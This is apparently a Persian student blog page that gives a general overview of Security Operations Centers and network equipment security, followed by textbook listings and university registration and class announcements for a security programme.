•    در چنين وضعيتي، چگونه با توليد گزارشات مناسب، مي¬توان رعايت قوانين و مقررات، استانداردها و بهترين تجربيات امنيتي را تضمين نمود؟
•    چگونه مي‌توان از محافظت مناسب دارايي‌هاي با ارزش سازمان اطمينان حاصل نمود؟
•    و بالاخره، چگونه مي¬توان تصويري کامل از وضعيت امنيتي شبکه سازمان ارائه نمود؟
ارائه راه حل
مرکز کنترل و عمليات امنيت SOC، ديدي بلادرنگ و جامع نسبت به وضعيت امنيت شبکه سازمان ايجاد مي‌نمايد. در واقع، اين مرکز بواسطه اطلاع¬رساني‌هاي اتوماتيک حوادث و وقايع، توليد گزارشات جزئي و کلي، پاسخ‌دهي اتوماتيک به حوادث و وقايع، رويکردي پيشگيرانه را در جهت مديريت ريســـک‌هاي امنيتي ايجاد خواهد نمود.
همچنين، اين مرکز، وقايع و حوادث را اولويت‌بندي مي‌نمايد، دارايي‌هاي متاثر شده از وقايع اتفاق افتاده را مشخص نموده و راهکارهاي اصلاحي و يا پيشگيرانه را پيشنهاد داده و يا در مواردي از پيش¬تعيين شده، اجرا مي‌نمايد.
اين مرکز، با ارايه گزارشاتي در سطوح مختلف، نيازمندي‌هاي مربوط به فرايندهاي مميزي و همچنين ارزيابي بخشي از ريسک‌هاي عملياتي زيرساخت شبکه را برآورده مي‌نمايد.
در واقع، مرکز عمليات امنيت شبکه, مکاني است براي جمع‌آوري اطلاعات و تجزيه تحليل آنها جهت پياده¬سازي استراتژي‌هاي امنيتي، همچون:
•    جلوگيري از حملات مبتني بر شبکه
•    جلوگيري از حملات مبتني بر ميزبان
•    شناسايي و جلوگيري از حملات پيچيده و ترکيبي
•    تشخيص و رفع آسيب¬پذيري¬هاي امنيتي تجهيزات
•    ايجاد ابزاري جهت به حداقل رساندن زيان و ضرر اقتصادي

نگاهي کلي به مرکز عمليات امنيت شبکه
مرکز عمليات امنيت، مجموعه¬اي از عوامل تکنولوژيک، فرآيندها و عوامل انساني است که به صورت پيوسته، رخدادهاي امنيتي را از تجهيزات مختلف و ناهمگون شبکه جمع¬آوري را براي شناسايي وقايع امنيتي آناليز مي نمايد.
مزايا و قابليت¬هاي مرکز عمليات امنيت
با توجه به موارد ذکر شده در بخش¬هاي قبلي، مي¬توان مزايا و قابليت¬هاي زير را براي مرکز عمليات امنيت شبکه برشمرد:
•    مديريت و پايش امنيت تجهيزات، شبكه‌هاي ارتباطي و رايانه‌ها، به صورت 24 ساعته
•    مديريت و مانيتورينگ لحظه‌اي تهديدات
•    جمع¬آوري و آناليز ترافيک شبکه
•    پاسخ¬دهي به مشکلات و رخدادهاي امنيتي
•    بهبود در اجراي خط¬مشي¬ها و استانداردهاي امنيتي

امنیت تجهیزات فیزیکی

برای تامین امنیت بر روی یک شبکه، یکی از بحرانی ترین و خطیرترین مراحل، تامین امنیت دسترسی و کنترل تجهیزات شبکه است. تجهیزاتی همچون مسیریاب، سوئیچ یا دیوارهای آتش.

اهمیت امنیت تجهیزات به دو علت اهمیت ویژه‌ای می‌یابد :

الف – عدم وجود امنیت تجهیزات در شبکه به نفوذگران به شبکه اجازه می‌دهد که‌ با دستیابی به تجهیزات امکان پیکربندی آنها را به گونه‌ای که تمایل دارند آن سخت‌افزارها عمل کنند، داشته باشند. از این طریق هرگونه نفوذ و سرقت اطلاعات و یا هر نوع صدمه دیگری به شبکه، توسط نفوذگر، امکان‌پذیر خواهد شد.

ب – برای جلوگیری از خطرهای DoS (Denial of Service) تأمین امنیت تجهزات بر روی شبکه الزامی است. توسط این حمله‌ها نفوذگران می‌توانند سرویس‌هایی را در شبکه از کار بیاندازند که از این طریق در برخی موارد امکان دسترسی به اطلاعات با دور زدن هر یک از فرایندهای AAA فراهم می‌شود.

در این بخش اصول اولیه امنیت تجهیزات مورد بررسی اجمالی قرار می‌گیرد. عناوین برخی از این موضوعات به شرح زیر هستند :

- امنیت فیزیکی و تأثیر آن بر امنیت کلی شبکه

- امنیت تجهیزات شبکه در سطوح منطقی

- بالابردن امنیت تجهیزات توسط افزونگی در سرویس‌ها و سخت‌افزارها

موضوعات فوق در قالب دو جنبه اصلی امنیت تجهیزات مورد بررسی قرار می‌گیرند :

- امنیت فیزیکی

- امنیت منطقی

فایل پیوستاندازه
Security2.pdf130.65 کیلوبایت

معرفی تجهیزات شبکه

Please do not reply to this E-mail. These E-mail(s) are processed automatically.
Our software will not understand your concern. Please use the contact form instead.
Shabakeh Gostar Engineering Co.  |   www.shabakeh.net  |  Unsubscribe me.

اخبار دانشگاه

سلام به دوستان گرامی

دوستان عزیز تمامی مطالبی که گذاشته می شود صرفا فقط برای کمک به شما همکلاسی های

عزیز است.این وبلاگ هم جنبه اطلاع رسانی دارد و هم پیگیری مساول کلاسی.

شما دوست عزیز بدونید که خیلی ها از جاهای دوری می آیند و سعی این است که اطلاعات

دانشگاه به همراه تحقیقاتی که از دانشگاه به عمل می آید انجام شود و در وبلاگ گذاشته شود.

این نکته را هم متذکر می شوم اخباری که دانشگاه روی سایت خودش می گذارد درستی یا

نادرستی آن به عهده اینجانب نمی باشد اما ما سعی در اطلاع رسانی آن داریم.

اگر دوستان عزیز خیلی از اخبار دانشگاه بروز هستند بخش نویسندگی برایشان در نظر گرفته

می شود تا بتوانند مطالب خود را در آن درج نمایند و اطلاع رسانی نمایند.

درباره اخبار دانشگاه هم می توانید با معاونت آموزشی آقای دکتر صفوی در این باره صحبت نمایید.


دانلود کتاب آموزش php

**اطلاعیه خیلی مهم**

از کلیه دانشجویان محترم که در سامانه سجاد نمره درس آنها صفر، غیبت موجه یا غیبت در

امتحان منظور گردیده است و یا برای درسی درخواست تجدیدنظر داده اند خواهشمند است تا

روز چهارشنبه مورخ 23/11/92 درخواست تجدیدنظر درس مربوطه خود را از طریق سامانه

سجاد نیز ثبت نمایند تا در اسرع وقت درخواست آنها رسیدگی شود.

لیست کتب که توسط مهندس جنگجو تالیف گردیده است


کتاب جدید آقای مهندس جنگجو مهندسی طراحی و برنامه نویسی صفحات

امن وب می باشد.

 
مهندسي شبكه‌هاي گسترده بي‌سيم
ناشر: مهرجرد،مهرگان قلم
پديدآور: ناصر مديري؛ مهرداد جنگجو



آزمايشگاه تحليل، طراحي و پياده‌سازي نرم‌افزار
ناشر: مهرگان قلم
پديدآور: ناصر مديري؛ مهرداد جنگجو
مهندسي امنيت شبكه‌هاي كامپيوتري
ناشر: مهرجرد،مهرگان قلم
پديدآور: ناصر مديري؛ مهرداد جنگجو
مهندسی امنیت شبکه‌های کامپیوتری

پدیدآورندگان : نویسنده: ناصر مدیری , نویسنده: مهرداد جنگجو
موضوع : شبكه‌های كامپیوتری - اقدامات تامینی
ناشر : مهرگان قلم , مهرجرد
محل نشر : تهران
قطع : وزیری
نوع کتاب : تالیف
زبان اصلی : انگلیسی
قیمت : 70000
نوع جلد : شومیز
قطع : وزیری
تیراژ : 500
تعداد صفحات : 296
تاریخ نشر : 1391/11/14
رده دیویی : 000058
شابک : 978-964-90741-7-7
"در این كتاب سعی شده است، ضمن بیان مفاهیم بنیادی امنیت شبكه، مدیران را با مسائل مطرح در امنیت شبكه‌های كامپیوتری آشنا كند. "فصل اول این كتاب، به معرفی مسائل عمومی امنیت شبكه، شامل وضع سیاست امنیتی، حملات شبكه‌ای و آشنایی مختصری با شبكه‌های بی‌سیم و امنیت آن می‌پردازد. در فصل دوم، معرفی مسیریاب، مخاطرات امنیتی و مسائل مربوط به بالا بردن سطح امنیتی مسیر یاب... در راس مطالب قرار دارد. فصل سوم بحثی كلی و جامع در مورد دروازه‌های امنیتی و دیوار آتش، انواع آن، معماری‌ها، سرویس‌های پیشرفته امنیتی ارائه شده در دیوار آتش و معرفی چند محصول را در این زمینه شامل می‌شود. در نهایت فصل چهارم، سیستم‌های شناسایی نفوذ و نفوذگر موسوم به IDS مورد بحث قرار گرفته است"."

قابل توجه دانشجویان دروس (استاد حسن زاده)


کلاس های درس استاد فوق در روز پنجشنبه مورخ 24/11/92 برگزار نمی گردد.

مانیتورنیگ کمیت های فیزیکی در مراکز داده

دانلود کتاب آموزش ایجاکس

دانلود کتاب آموزش ایجاکس

جزوه آموزش جاوا اسکریپ

دانلود جزوه آموزش جاوا اسکریپ


ثبت نام ترم 6

سلام دوستان گرامی

ثبت نام ترم 6 در مرکز سجاد باز شده است.

برای ثبت نام ترم 6 اقدام کنید.

اصلاحیه جدید برنامه زمانبندی و درسی نیمسال دوم سال تحصیلی 93-92 مورخ 17/11/92

کلیه دانشجویان می توانند جهت اطلاع از اصلاحات انجام شده در برنامه درسی نیمسال دوم سال تحصیلی 93-92 فایل پیوست را دانلود نمایند. اصلاحات شامل موارد زیر است: 1- ارائه پودمان 4 امنیت اطلاعات (ورودی 911) 2- ارائه گروه دوم ترم چهارم کارشناسی برنامه‌سازی تحت وب 3- ارائه گروه دوم ترم چهارم کارشناسی امنیت اطلاعات افزایش ظرفیت دروس نظری و بعضی از دروس کارگاهی در رشته‌های کاردانی و کارشناسی سخت‌افزار، مخابرات و فناوری ارتباطات و اطلاعات (ICT) دانشجویان گرامی از تاریخ 92/11/19 مطابق با برنامه درسی در کلاسها حضور یابند.


لینک فایل حجم فایل
barname1392-93_2_13921117.xls156.500 KB


دوستان عزیز اگر کسی فایل ارائه کلیه درس های رشته امنیت را دارد برای من ارسال کند که دوستان دیگر هم

اطلاع پیدا کنند واحد دیگه ای می ماند یا خیر منظور دروس عمومی است.

دوستانی که رشته قبلی آنها توی مراکز علمی و کاربردی بوده نیازی نیست اما دوستان دیگر باید درس کارآفرینی

را هم پاس نمایند.

منتظر خبر شما هستم.

استاد پهلوان

با سلام خدمت دوستان گرامی

امروز که پنج شنبه بود، با دکتر صفوی در مورد استاد پهلوان صحبت کردم. قرار بر این شد که ایشون همچنان در دانشگاه حضور داشته باشند ولی در یک گروه. کسانی که دوست دارند، میتونن با ایشون دروس رو انتخاب کنن و کسانی که نمیخوان توی گروه های دیگه باشن.

راستشو بخواین، خیلی متاسف شدم از بچه هایی که از ایشون انتقاد کردند. اگه چندتا استاد بدرد بخور توی دانشگاه باشه، یکیشون استاد پهلوان هستن که واقعا دل سوزوندن برای دانش و سطح علمی بچه ها. بهترین درس و مطالب رو ارائه دادند، با سختی ای که برای خودشون بود، با کلامی نسبتا ساده، جوری که بشه تقریبا راحت مطالب رو یاد داد، به دانشجویان تدریس کردن. در نهایت، نمره ها حداقل از 23 تا 25 نمره محاسبه شد. 2 نمره حضور در کلاس، 2 نمره کنفرانس، حداقل 1 نمره ارفاق، حداقل 1 نمره جواب به سوالات کلاسی. تا همینجا 6 نمره براحتی میشد گرفت. میان ترم 3 نمره و پایان ترم هم اگر 3 نمره بگیرین، میشین 12.

به نظرم مطالبی که ایشون توی کلاساشون بازگو میکردند، ارزش نمره 15 یا حتی 13 رو هم داشت. مطالبی که ایشون در مورد شبکه گفتن، واسه کسی مثل بنده که فکر میکردم تو شبکه واسه خودم کسی هستم، خیلی پیجیده تز از دید من توی این مباحث بود و در واقع بهم ثابت شد که هنوز خیلی جوجو ام.

بهتره به جای درخواست نمره مفت، درخواست مطالب ارزشمند رو از استاد داشته باشین.

شاد، پیروز و موفق باشید دوستان.

ثبت نام در روز پنج شنبه هم ادامه دارد

سلام دوستان گرامی

با توجه به پیگیری ها فردا تا ساعت 12 دانشگاه برای ثبت نام باز است.

موفق باشید.

آخرین خبر از گرفتن پودمان 6

سلام دوستان گرامی

من دیروز یک سر دانشگاه رفتم و با خانم پرچی زاده صحبت کردم .

گرفتن ترم 6 منوط به نداشتن دروس افتاده در پودمان های قبلی می باشد .

لذا توجه نمایید جمع واحد شما از 24 واحد طبق گفته خانم پرچی زاده نباید بیشتر شود.

به زودی تا زمان حذف و اضافه فضایی برای ثبت نام ترم 6 باز می شود اما اگر با نامه ای لیست

دوستان هست اضافه شود امکان نوشتن نامه ای توسط یکی از شما دوستان برای پیگیری وضعیت

ترم 6 و ارجاع به دانشگاه جهت پیگیری تو اولویت قرار می گیرد.

لیست دوستانی که توی لیست گرفتن ترم 6 می باشند به شرح زیر است :

 

1-خام مینا شهواری

2-خانم فاطمه علیاری

3- خانم رویا قادری

4-خانم سنا سرانجام

5-آقای استیری

6-خانم ریحانه رحیم پور

7-آقای طاعتی

8-آقای مصطفی نادری

9-خانم زادحسن

10-آقای زیبایی

11-آقای سروش

12-خانم ندا سلگی

13-خانم پریسا قلی زاده

14-محمدرضا یوسفی مهر

آخرین خبرها از ترم 6

سلام دوستان گرامی

طی صحبت هایی که با جناب آقای اختراع شاغل در دانشگاه جامع داشتم قرار شد ایشان حضوری

پیگیر این مسئله باشند.

اما از طرف دیگر آقای مهندس نصیری که هم یکی از مدرسین ترمی که گذشت بوده و جزء

بازرسین دانشگاه جامع بوده جریان را مطرح نمودم و ایشان لطف نموده و مراتب را پیگیری نمودند.

بعد از اینکه من جناب مهندس نصیری را در جریان مشکل ترم 6 قرار داده و اینکه دانشجویان

نمی توانند ترم 6 را بدلیل اینکه سقف واحد انتخاب واحد از 20 واحد بیشتر می شود انتخاب نمایند

لذا ایشان ابتدا با دانشگاه جامع علمی و کاربردی مطرح کرده و بعد طبق صحبت با خانم پرچی زاده

مشکل از مرکز دانشگاه جامع علمی و کاربردی می باشد و مرکز باید دانشجو را تبدیل به وضعیت

دانشجوی ترم آخر نماید .

دانشجویان محترم بین امروز تا فردا  تست کنید اگر نتوانستید ترم 6 را انتخاب کنید در زمان حذف و

اضافه می توانید و مهلت انتخاب ترم 6 وجود دارد.

فعلا حداقل ترم 5 را انتخاب نمایید تا وضعیت ترم 6 در دانشگاه جامع علمی و کاربردی مشخص

شود.

ضمنا خواهشمند است فرمی تهیه شود و در دانشگاه دانشجویانی که خواستار برداشتن ترم 6

می باشند نام و مشخصات وشماره دانشجویی خود را در فرم پر و امضا نمایند تا مشخص شود چه

کسانی تمایل به انتخاب ترم 6 دارند تا در اولین فرصت ترم 6 بعد تصحیح درستی بتوانند ترم 6 به

آنها اختصاص داده شود.

در ضمن باید سریعا تعداد دوستانی که می خواهند هم در نظرات پیغام بدهند تا سریعا نامه ای

برای درخواست ترم 6 در اختیار دانشگاه برای پیگیری این مورد انجام شود.

شهریه 12 واحد پودمانی طبق 85% معادل 429000 تومان می باشد.


از زحمات آقای مهندس نصیری و آقای اختراع کمال تشکر را دارم.

آخرین اخبار دانشگاه و انتخاب و ثبت نام ترم جدید

با سلام به همه عزیزان گرامی

به موارد زیر توجه نمایید :

1-ابتدا باید حتما شهریه 15% حق نظارت را پرداخت نمایید این شهریه برای ترم قبلی بوده و

شهریه 15% ترم جدید بعد از حذف و اضافه در سامانه سجاد قابل پرداخت می باشد.

2-حتما از پرداخت های حق نظارت 15% و انتخاب واحد خود پرینت بگیرید و موقع واریز با خود

برای ارائه به دانشگاه همراه داشته باشید.

3-واحد های عمومی بعد از حذف و اضافه قابل انتخاب واحد می باشند.

4-هزینه پرداختی می تواند از طریق بانک یا از طریق سیستم شتاب در دانشگاه پرداخت

گردد.

5-انتخاب پودمان ها بصورت تک درس مقدور نیست لذا یا کل پودمان و در غیر اینصورت انتخاب

تکواحد تخصصی امکان پذیر نمی باشد در ترم جدید.

6-هزینه شهریه ترم جدید در سامانه سجاد می باشد که باید پرینت گرفته شود و هزینه بدون

انتخاب دروس عمومی می باشد.

7-دوستان محترمی که ترم های پایین ترم نظیر 3 یا 4 هستند باید از طریق پیگیری سایت

دانشگاه یا از طریق تماس با مسئولین یا حضور در دانشگاه از وضعیت ترم جاری خود مطلع

گردند.

8-کلیه دانشجویانی که در زمان انتخاب واحد دچار مشکل شده اند و یا اینکه دروسی از ترم و

پودمان آنها ارائه نگردیده است می توانند روز چهارشنبه مورخ 16/11/92 به واحد آموزش مراجعه

نمایند.

9-انتخاب ترم 5 و 6 برای پودمانی قابل انتخاب می باشد منوط به نوشتن و ارائه نامه به خانم

غلامی

مراحل روش ثبت نام در دانشگاه برای ترم جدید:

1-ابتدا پیش خانم فراهانی مراجعه کرده و فرم پرینت گرفته شده دروس انتخابی را ارائه دهید.

2-هزینه ترم جاری خود را از طریق بانک عضو شتاب پرداخت نمایید (پیش خانم فراهانی این کار را

انجام دهید)

3-بعد از امضا و مهر واحد مالی که توسط خانم فراهانی زده می شود به تایید خانم پرچی زاده

برسد.

4-بهد از مهر و تایید خانم پرچی زاده ارائه برگه تایید واحد به خانم فراهانی و کپی رسید برگه واریز

بانکی و کپی گرفتن از فرم انتخاب واحد و فیش واریزی و 3 برگ کپی از این صفحات گرفته شود.

5-ارائه کپی ها به خانم فراهانی امضا و تایید نهایی 3 برگه کپی و نهایتا :

یک برگ در اختیار خانم فراهانی

یک برگ به خانم داوودی تحویل داده شود.

یک برگ به عنوان سند ثبت نام در اختایر خود شما قرار می گیرد.


نکته :

دوستانی که دروس جبرانی و عمومی دارند یک برگه فرم از واحد آموزش دریافت نمایند و

نسبت به انتخاب واحد دروس عمومی و جبرانی خود اقدام نمایند.

جوابیه به تغییر استاد محترم :

با سلام دوستان گرامی طبق جلسه ای که دیروز با جناب دکتر صفوی و خانم غلامی بود

و نامه ای که ارائه شد قرار شد استاد محترم جابجا گردد و ضمنا چون در سامانه است شما

درس را انتخاب نموده و قرار شده است که استاد دیگری جایگزین شود.